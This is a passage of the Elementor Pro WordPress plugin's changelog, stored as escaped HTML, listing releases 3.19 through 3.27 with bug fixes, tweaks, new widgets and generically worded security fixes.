enforcement in Template Condition<\\/li>\\n<\\/ul>\\n<h4>3.27.5 - 2025-03-03<\\/h4>\\n<ul>\\n<li>Fix: The <code>wp_trigger_error<\\/code> function causes the site to crash instead of triggering a warning when used with ACF text<\\/li>\\n<\\/ul>\\n<h4>3.27.4 - 2025-02-16<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Screenshots module<\\/li>\\n<li>Security Fix: Improved code security enforcement in Query control<\\/li>\\n<li>Fix: ACF <code>true_false<\\/code> field causing a fatal error when used as a dynamic tag with third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/30170\\\">#30170<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.27.3 - 2025-02-06<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Stripe Button widget<\\/li>\\n<\\/ul>\\n<h4>3.27.2 - 2025-02-03<\\/h4>\\n<ul>\\n<li>Fix: Value type configuration issue causing errors when using ACF<\\/li>\\n<li>Fix: Hide content on responsive breakpoint option is not working on WordPress Menu widget when Optimized Markup experiment is activated<\\/li>\\n<\\/ul>\\n<h4>3.27.1 - 2025-01-27<\\/h4>\\n<ul>\\n<li>Tweak: Increased the number of items allowed in Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<li>Security Fix: Improved code security enforcement in Global widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Admin settings<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Empty custom fields are missing in the Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<\\/ul>\\n<h4>3.27.0 - 2025-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Removed the <code>elementor-widget-container<\\/code> div from the Menu, Loop, Table of Contents, Form, and Hotspot widgets as part of the Optimized Markup experiment to improve HTML structure<\\/li>\\n<li>Tweak: Reduced DOM size by optimizing the submit button markup in Search widget<\\/li>\\n<li>Tweak: Moved style loading to the head instead of the footer to improve CLS<\\/li>\\n<li>Tweak: Enabled conditional loading of Swiper.js based on widget dependencies to reduce unnecessary assets and improve page load times<\\/li>\\n<li>Tweak: Standardized navigation elements like arrows and bullets across all carousel and slider widgets for improved accessibility<\\/li>\\n<li>Tweak: Improved accessibility when the submit button has only an icon and no text in Search widget<\\/li>\\n<li>Tweak: Removed <code>load_plugin_textdomain()<\\/code> function from Elementor Pro<\\/li>\\n<\\/ul>\\n<h4>3.26.3 - 2025-01-07<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Search widget<\\/li>\\n<li>Fix: Height issues cause slideshow thumbnails to display incorrectly in Media Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29663\\\">#29663<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.2 - 2024-12-22<\\/h4>\\n<ul>\\n<li>Fix: Menu items are not clickable in various scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29191\\\">#29191<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.1 - 2024-12-17<\\/h4>\\n<ul>\\n<li>Fix: Restore deprecated <code>Plugin::enqueue_styles()<\\/code> function to avoid errors with 3rd party plugins<\\/li>\\n<\\/ul>\\n<h4>3.26.0 - 2024-12-16<\\/h4>\\n<ul>\\n<li>New: Introducing dynamic content support for Off-canvas in Loop Grid widget templates - enabling seamless display of additional content dynamically (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29049\\\">#29049<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28935\\\">#28935<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7106\\\">#7106<\\/a>)<\\/li>\\n<li>New: AdBlock Detection trigger for Popups - display targeted popups for visitors using ad blockers<\\/li>\\n<li>New: Added Reload Page link action for Dynamic Tags<\\/li>\\n<li>Tweak: Added "Space Between Dots" control to Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2526\\\">#2526<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3277\\\">#3277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21697\\\">#21697<\\/a>)<\\/li>\\n<li>Tweak: Replaced hidden <code>elementor-screen-only<\\/code> div with <code>aria-label<\\/code> attributes<\\/li>\\n<li>Tweak: Removed <code>elementor-widget-container<\\/code> div from Elementor widgets as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Optimize popup styling by loading it only when necessary<\\/li>\\n<li>Tweak: Updated Gap between slides control to support only PX units in Carousel widget<\\/li>\\n<li>Tweak: Removed the dependency between the Tabs handler and the Menu handler<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> in Carousel widgets<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=carousel<\\/code> to carousel wrapper<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=slide<\\/code> to slide wrapper<\\/li>\\n<li>Tweak: Optimized carousel widgets markup as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Updated minimum required Safari version to 15.5<\\/li>\\n<li>Tweak: Facebook widgets are no longer supported on mobile due to Facebook functionality changes<\\/li>\\n<li>Fix: Motion Effects sticky feature is not working when Scroll Snap is enabled<\\/li>\\n<li>Fix: Custom Image Resolution option is not working in Gallery widget<\\/li>\\n<li>Fix: \'Reading Settings\' unexpectedly reduces the number of posts displayed when using the Archive with Pagination setting<\\/li>\\n<li>Fix: Step Form does not scroll to the top when the first field is not an input field in Form widget<\\/li>\\n<li>Fix: Display Condition feature is available without an active Elementor license in Floating Elements<\\/li>\\n<li>Fix: Background options of Flip Box in Loop Grid widget are not working when images are added using ACF Dynamic Tags<\\/li>\\n<li>Fix: Dropdown icon in the Select field of the Form widget is cut off when the Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Incompatibility between Form widget and WPML when using Nested Elements<\\/li>\\n<li>Fix: Performance issues when changing the title name in the Menu widget<\\/li>\\n<li>Fix: Warnings appear when Element Caching is set to Inactive in Carousel widgets<\\/li>\\n<li>Fix: Swiper styling missing from Lightbox inside Gallery widgets<\\/li>\\n<\\/ul>\\n<h4>3.25.5 - 2024-12-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Popup overlay shown for non-logged users even when disabled<\\/li>\\n<\\/ul>\\n<h4>3.25.4 - 2024-11-20<\\/h4>\\n<ul>\\n<li>Tweak: Improved Global Widget loading method to enhance performance<\\/li>\\n<\\/ul>\\n<h4>3.25.3 - 2024-11-13<\\/h4>\\n<ul>\\n<li>Fix: Nested Elements are activated even when the Container experiment is inactive<\\/li>\\n<\\/ul>\\n<h4>3.25.2 - 2024-11-03<\\/h4>\\n<ul>\\n<li>Fix: Styling issues affecting popup layout when using a Dynamic Tag to open the popup<\\/li>\\n<li>Fix: Image captions are not displaying for non-logged-in users in Media Carousel widget<\\/li>\\n<li>Fix: Custom Add to Cart widget with Quantity enabled causes critical error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29159\\\">#29159<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.25.1 - 2024-10-31<\\/h4>\\n<ul>\\n<li>Fix: Multiple Custom Add to Cart widgets on the same page are adding the same product<\\/li>\\n<\\/ul>\\n<h4>3.25.0 - 2024-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added pagination functionality to the Live Results in Search widget<\\/li>\\n<li>Tweak: Added Anchor Offset control to allow precise positioning when scrolling to anchor links on the page<\\/li>\\n<li>Tweak: Load motion effects styles only when they are in use<\\/li>\\n<li>Tweak: Load sticky styles only when they are in use<\\/li>\\n<li>Tweak: Load popup styles only when they are in use<\\/li>\\n<li>Tweak: Load theme builder styles only when they are in use<\\/li>\\n<li>Tweak: Load transition styles for Call to Action and Gallery widgets only when they are in use<\\/li>\\n<li>Tweak: Load styles for Form widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for WooCommerce widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Theme Elements widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Carousel widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Pricing widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Floating Elements separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Link in Bio widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load minified CSS in the Loop Builder\'s Call to Action button in the Editor<\\/li>\\n<li>Tweak: Removed "Payments" module styles<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Payapl widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Stripe widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Merged "Form Submissions" feature into the version and moved it to the Advanced tab<\\/li>\\n<li>Tweak: Merged "Display Conditions" into the version<\\/li>\\n<li>Fix: Missing translation string for the empty message in the Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27580\\\">#27580<\\/a>)<\\/li>\\n<li>Fix: Local Storage and Session Storage were being used even when popups were not in use (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7151\\\">#7151<\\/a>)<\\/li>\\n<li>Fix: Masonry layout is not working when pagination is set to "Load More" or "Infinite Scroll" in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23684\\\">#23684<\\/a>)<\\/li>\\n<li>Fix: Extra gap between widgets on the frontend when using Off-canvas widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27706\\\">#27706<\\/a>)<\\/li>\\n<li>Fix: Pagination and custom queries did not work when the Posts Widget was saved as a Global Widget or used via shortcode<\\/li>\\n<li>Fix: Lightbox videos are missing controls and displayed at the wrong size in Media Carousel widget<\\/li>\\n<li>Fix: Pagination options with Individual Pagination not working as expected in Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Justified or Masonry layouts for the Pro Gallery would not display images on the frontend when inserted via nested tabs<\\/li>\\n<li>Fix: Error issue in the Loop Grid widget when used in theme parts with the Taxonomy Filter<\\/li>\\n<li>Fix: Removed the focus ring after clicking to open the Off Canvas inside the Editor<\\/li>\\n<li>Fix: Background gradient colors from the dynamic color tag values are not rendering on the frontend<\\/li>\\n<li>Fix: Excessive database requests generated by the Loop Grid widget<\\/li>\\n<li>Fix: Colors from Dynamic Tags were not rendered on the frontend<\\/li>\\n<li>Fix: Display issue in the Menu widget caused by the \'Native Intersection Observer API<\\/li>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget<\\/li>\\n<li>Fix: Content Width control inside the Mega Menu is displaying an empty value<\\/li>\\n<\\/ul>\\n<h4>3.24.4 - 2024-10-09<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<\\/ul>\\n<h4>3.24.3 - 2024-10-01<\\/h4>\\n<ul>\\n<li>Fix: Floating Elements template not loading when Single Page template is set with All Singular condition<\\/li>\\n<li>Fix: Form field styles not loading properly in various scenarios<\\/li>\\n<\\/ul>\\n<h4>3.24.2 - 2024-09-18<\\/h4>\\n<ul>\\n<li>Fix: Icons not displaying when Inline SVG Icons experiment is active in Link In Bio widgets and Floating Elements<\\/li>\\n<\\/ul>\\n<h4>3.24.1 - 2024-09-12<\\/h4>\\n<ul>\\n<li>Fix: Widget styles not loading correctly on front causing alignment inconsistencies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28676\\\">#28676<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.24.0 - 2024-09-10<\\/h4>\\n<ul>\\n<li>New: Introducing support for Variable Fonts - allowing for more dynamic and flexible text styling (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6703\\\">#6703<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11333\\\">#11333<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19277\\\">#19277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25485\\\">#25485<\\/a>)<\\/li>\\n<li>Tweak: Added \'Structure\' indication for widgets with Display Conditions applied (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28027\\\">#28027<\\/a>)<\\/li>\\n<li>Tweak: Added a new option for setting the live search results width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28280\\\">#28280<\\/a>)<\\/li>\\n<li>Tweak: Improved Honeypot field functionality in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28480\\\">#28480<\\/a>)<\\/li>\\n<li>Tweak: Added options to \'Copy\', \'Paste\', and \'Clear\' Display Conditions in Context Menu<\\/li>\\n<li>Tweak: Improved performance of the Menu widget when using Dynamic Tags in the URL field<\\/li>\\n<li>Tweak: Improved performance when using Dynamic Tags in Nested Elements<\\/li>\\n<li>Tweak: Added the option for users to disable Akismet for specific Elementor forms<\\/li>\\n<li>Tweak: Adjusted URL structure when presenting the Search Archive page in Search widget<\\/li>\\n<li>Tweak: Added the \'Create Template\' button in Search widget<\\/li>\\n<li>Tweak: Added an option to enable the \'Loader\' animation while live results are loading in Search widget<\\/li>\\n<li>Tweak: Load share buttons compatibility styles only when they are in use<\\/li>\\n<li>Tweak: Load dialog styles only when they are in use<\\/li>\\n<li>Tweak: Load global widget styles only during Editor preview<\\/li>\\n<li>Tweak: Conditionally load widget styles only when the widgets are used<\\/li>\\n<li>Tweak: Load styles for CTA hover animations only when they are in use<\\/li>\\n<li>Tweak: Load notes styles only when the WordPress Toolbar is displayed<\\/li>\\n<li>Tweak: Split <code>animations.min.css<\\/code> into multiple CSS files and load them conditionally<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Stable status<\\/li>\\n<li>Tweak: Merged Taxonomy Filter feature into the version<\\/li>\\n<li>Tweak: Merged Search feature into the version<\\/li>\\n<li>Tweak: Added a note to \'Current Query\' explaining the impact of WordPress settings on pagination within Archives<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for the Off-Canvas widget<\\/li>\\n<li>Fix: Manual Selection option is not excluding sticky posts in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18689\\\">#18689<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23331\\\">#23331<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28179\\\">#28179<\\/a>)<\\/li>\\n<li>Fix: Template ID does not change according to the imported Loop Item (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21404\\\">#21404<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22202\\\">#22202<\\/a>)<\\/li>\\n<li>Fix: \'Editing Mode\' for the Off-canvas was not functioning correctly in certain scenarios<\\/li>\\n<li>Fix: Added definition to <code>clear_custom_image_sizes<\\/code> hook to prevent edge case issues<\\/li>\\n<li>Fix: Flickering issue with search result buttons when closing results using the keyboard escape key in Search widget<\\/li>\\n<li>Fix: Theme Style settings for buttons were overriding the text styling in Search widget<\\/li>\\n<li>Fix: Nesting menu inside another menu causes functionality issues in Menu widget<\\/li>\\n<li>Fix: Error when using array as custom fields value in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.23.3 - 2024-08-05<\\/h4>\\n<ul>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28194\\\">#28194<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.23.2 - 2024-07-29<\\/h4>\\n<ul>\\n<li>Fix: Horizontal scroll bar appearing on the page when using Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28087\\\">#28087<\\/a>)<\\/li>\\n<li>Fix: Dropdown area disappearing in certain scenarios in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.23.1 - 2024-07-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in link URL<\\/li>\\n<\\/ul>\\n<h4>3.23.0 - 2024-07-15<\\/h4>\\n<ul>\\n<li>New: Search Widget with Live Results - Display live search results as visitors type into the search box, enhancing user experience and engagement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27664\\\">#27664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24931\\\">#24931<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21459\\\">#21459<\\/a>)<\\/li>\\n<li>Tweak: Renamed <code>width<\\/code> to <code>Min width<\\/code> and added <code>Max width<\\/code> control to Hotspot tooltips (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18930\\\">#18930<\\/a>)<\\/li>\\n<li>Tweak: Applied a logical DOM order to the Mega Menu widget to improve accessibility<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for WordPress Menu widget<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for Menu widget<\\/li>\\n<li>Tweak: Added a bottom option to the Image Position control in Call to Action widget<\\/li>\\n<li>Fix: Missing version string in included CSS query string when Improved CSS Loading is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21879\\\">#21879<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23821\\\">#23821<\\/a>)<\\/li>\\n<li>Fix: Form submission icon message does not display correctly when Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Save and Close button position issues in the conditions screen in Theme Builder.<\\/li>\\n<li>Fix: Focus appears on the first element when using the mouse to open Off-Canvas <\\/li>\\n<li>Fix: Links to Elementor Settings are broken in various locations<\\/li>\\n<li>Fix: Conditions field not showing all relevant conditions in Theme Builder<\\/li>\\n<li>Fix: Off-Canvas flickering in sticky containers with exit animations triggered by sticky effects<\\/li>\\n<\\/ul>\\n<h4>3.22.1 - 2024-06-24<\\/h4>\\n<ul>\\n<li>Fix: Styling of Global widgets not loading when Element Caching experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27704\\\">#27704<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.22.0 - 2024-06-16<\\/h4>\\n<ul>\\n<li>New: Introducing Off-Canvas widget - create engaging and creative layers triggered by a link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6225\\\">#6225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21769\\\">#21769<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25770\\\">#25770<\\/a>)<\\/li>\\n<li>Tweak: Added option to remove \'User IP\' and \'User Agent\' from the form submissions metadata (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14285\\\">#14285<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>waypoints.js<\\/code> library with the native Intersection Observer API<\\/li>\\n<li>Tweak: Extended Alignment and Position capabilities in Form widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Flip Box widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Call to Action widget<\\/li>\\n<li>Tweak: Optimized Form widget to eliminate unnecessary markup when the button icon is empty<\\/li>\\n<li>Tweak: Optimized Posts widget to eliminate unnecessary markup when Load More button text is empty<\\/li>\\n<li>Tweak: Remove <code>placeholder<\\/code> arguments from URL controls<\\/li>\\n<li>Tweak: Implemented CSS logical properties to Icon Position in Form, Posts and Menu Cart widgets<\\/li>\\n<li>Tweak: Activated Display Conditions feature for existing sites<\\/li>\\n<li>Tweak: Activated Taxonomy Filter feature for existing sites<\\/li>\\n<li>Tweak: Added functionality to delay the running of the ready triggers on inner elements<\\/li>\\n<li>Fix: Icons are now part of the link in the Menu Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24298\\\">#24298<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25112\\\">#25112<\\/a>)<\\/li>\\n<li>Fix: <code>all: unset<\\/code> assigned to buttons cause focus issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24322\\\">#24322<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25448\\\">#25448<\\/a>)<\\/li>\\n<li>Fix: Menu cart SVG icon disappears on front when Optimized Control Loading experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27342\\\">#27342<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro auto-updates are not working on multisite networks (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12615\\\">#12615<\\/a>)<\\/li>\\n<li>Fix: PHP error appears in the editor when using Loop Grid in an archive template<\\/li>\\n<li>Fix: UI glitch on Icon Position control in Paypal and Stripe Buttons widgets<\\/li>\\n<li>Fix: Icon Position control RTL issue in Hotspot widget<\\/li>\\n<li>Fix: Manual Selection "Include By" Query doesn\'t work with product categories<\\/li>\\n<\\/ul>\\n<h4>3.21.3 - 2024-05-20<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Loop Grid widget<\\/li>\\n<li>Fix: License expired affects the Display Conditions functionality in the front end<\\/li>\\n<\\/ul>\\n<h4>3.21.2 - 2024-04-30<\\/h4>\\n<ul>\\n<li>Fix: Special characters are not displayed correctly when using the Excerpt widget in Loop template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25860\\\">#25860<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.21.1 - 2024-04-24<\\/h4>\\n<ul>\\n<li>Fix: Excerpt Length setting doesn\'t function correctly for languages with non-English characters in Post Excerpt widget<\\/li>\\n<\\/ul>\\n<h4>3.21.0 - 2024-04-15<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Taxonomy Query - Enabling the display of post and product categories and tags within Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21372\\\">#21372<\\/a>)<\\/li>\\n<li>Tweak: Optimized Hotspot widget to prevent rendering when no image is provided<\\/li>\\n<li>Tweak: Optimized Blockquote widget to eliminate unnecessary markup when devoid of content<\\/li>\\n<li>Tweak: Optimized Template widget to eliminate unnecessary markup when no template is selected<\\/li>\\n<li>Tweak: Optimized Code Highlight widget to eliminate unnecessary markup when there is no content<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Portfolio widget<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Author Avatar image alt text in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25440\\\">#25440<\\/a>)<\\/li>\\n<li>Tweak: Notes feature merged to version<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Profile Picture alt text in Author widget<\\/li>\\n<li>Fix: Display issue on hover state in WooCommerce Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.20.3 - 2024-04-10<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issue between the My Account widget and other third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20986\\\">#20986<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.20.2 - 2024-03-26<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Post Navigation widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Gallery widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.20.1 - 2024-03-20<\\/h4>\\n<ul>\\n<li>Fix: Strengthened code integrity in deprecated Woo Single Element widget<\\/li>\\n<li>Fix: PHP error notice appears when using Loop Grid with the Taxonomy Filter widgets<\\/li>\\n<\\/ul>\\n<h4>3.20.0 - 2024-03-11<\\/h4>\\n<ul>\\n<li>Tweak: Implemented OR logic in the Display Conditions feature<\\/li>\\n<li>Tweak: Added X and Threads social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25299\\\">#25299<\\/a>)<\\/li>\\n<li>Tweak: Added Archive Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Alt dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Caption dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Bio dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Email dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Website dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Page Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Post Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Comments Number rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Archive Author rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added support for WordPress Custom Fields in Display Conditions feature<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23875\\\">#23875<\\/a>)<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Login widget<\\/li>\\n<li>Tweak: Added additional style controls in the Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration option in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21295\\\">#21295<\\/a>)<\\/li>\\n<li>Tweak: Added Transition Duration to button in Flip Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Author Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to List in Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Login widget<\\/li>\\n<li>Tweak: Added Transition Duration in Post Navigation widget<\\/li>\\n<li>Tweak: Added Transition Duration Show More in Video Playlist widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Form widget<\\/li>\\n<li>Tweak: Removed separator-none argument from all Editor controls<\\/li>\\n<li>Tweak: Add <code><time><\\/code> wrapper for Date and Time items in Post Info widget<\\/li>\\n<li>Tweak: Page Transitions feature merged to version<\\/li>\\n<li>Tweak: Scroll Snap feature merged to version<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Beta status and activated for new sites<\\/li>\\n<li>Tweak: Promoted Taxonomy Filter feature to beta status and activated for new sites<\\/li>\\n<li>Fix: Page Transitions feature and Load Font Awesome 4 Support cause a console error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18885\\\">#18885<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19334\\\">#19334<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21082\\\">#21082<\\/a>)<\\/li>\\n<li>Fix: Added better output escaping in Taxonomy Filter widget<\\/li>\\n<\\/ul>\\n<h4>3.19.3 - 2024-02-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved Loop CSS loading structure in Loop Grid item<\\/li>\\n<li>Security Fix: Addressed security weaknesses in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.19.2 - 2024-02-07<\\/h4>\\n<ul>\\n<li>Fix: Export data inconsistencies when using form actions in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.19.1 - 2024-02-05<\\/h4>\\n<ul>\\n<li>Fix: Enqueuing non-existing Loop Template CSS file in Loop Item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24959\\\">#24959<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>3.19.0 - 2024-01-29<\\/h4>\\n<ul>\\n<li>New: Introducing Display Conditions for Elements - allowing users to customize content visibility based on specified criteria (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4246\\\">#4246<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21152\\\">#21152<\\/a>)<\\/li>\\n<li>New: Implemented Akismet Integration for enhanced spam protection and security in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11401\\\">#11401<\\/a>)<\\/li>\\n<li>New: Introducing Permissions functionality to Element Manager - providing users with enhanced control over access and management capabilities<\\/li>\\n<li>Tweak: Added styling option for dropdown indicator in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21907\\\">#21907<\\/a>)<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Implemented CSS logical properties in WordPress Menu 